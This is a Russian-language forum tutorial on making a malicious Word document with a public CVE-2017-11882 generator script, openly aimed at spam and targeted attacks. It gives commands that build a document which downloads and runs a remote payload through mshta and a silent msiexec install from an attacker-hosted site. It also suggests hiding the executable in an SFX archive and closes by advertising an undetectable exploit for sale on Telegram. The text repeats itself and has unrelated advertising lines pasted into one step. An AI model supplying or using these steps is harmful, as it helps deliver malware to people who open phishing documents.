Многим из вас иногда нужен doc exploit, для спама или точечных атак. Сегодня покажу как сделать простой эксплойт.
1) для этого нам понадобится обычный скрипт для автоматизации который будет генерировать нашу cve https://github.com/Ridter/CVE-2017-11882
2) мы видим два скрипта которые находятся на 43bt и на 109bt(ограничение на введенную команду)
нам понадобится на 109, потому что кроме того же калькулятора мы запустить ничего не сможем(ограничение). скачиваем скрипт на 109bt
3) МЕТОДЫ
MSHTA
Самое банальное и глупое что можно сделать это метод скачивания mshta,
создаем .hta файл и вносим в него код на скачивание, заливаем на наш сайт. После вводим
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
MSIEXEC
скачиваем любой конвертвер например этот
конвертируем наш ехе в msi, заливаем msi на наш сайт(если ехес не происходит добавьте в sfx архив). И вводим
python Command109b_CVE-2017-11882.py -c "msiexec /q /i http://site.ru/msi.msi"
вот мы разобрали два простых примера скачивания как быстро сделать doc exploit.
Если вам нужен fud doc exploit обращайтесь телеграмм @gankgh
1) для этого нам понадобится обычный скрипт для автоматизации который будет генерировать нашу cve https://github.com/Ridter/CVE-2017-11882
2) мы видим два скрипта которые находятся на 43bt и на 109bt(ограничение на введенную команду)
нам понадобится на 109, потому что кроме того же калькулятора мы запустить ничего не сможем(ограничение). скачиваем скрипт на 109bt
3) МЕТОДЫ
MSHTA
Самое банальное и глупое что можно сделать это метод скачивания mshta,
создаем .hta файл и вносим в него код на скачивание, заливаем на наш сайт. После вводим
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
MSIEXEC
скачиваем любой конвертвер например этот
Exe to msi Converter - Convert exe installers to msi packages.
Exe to msi Converter. Convert exe installers to msi packages.
www.exetomsi.com
python Command109b_CVE-2017-11882.py -c "msiexec /q /i http://site.ru/msi.msi"
вот мы разобрали два простых примера скачивания как быстро сделать doc exploit.
Если вам нужен fud doc exploit обращайтесь телеграмм @gankgh
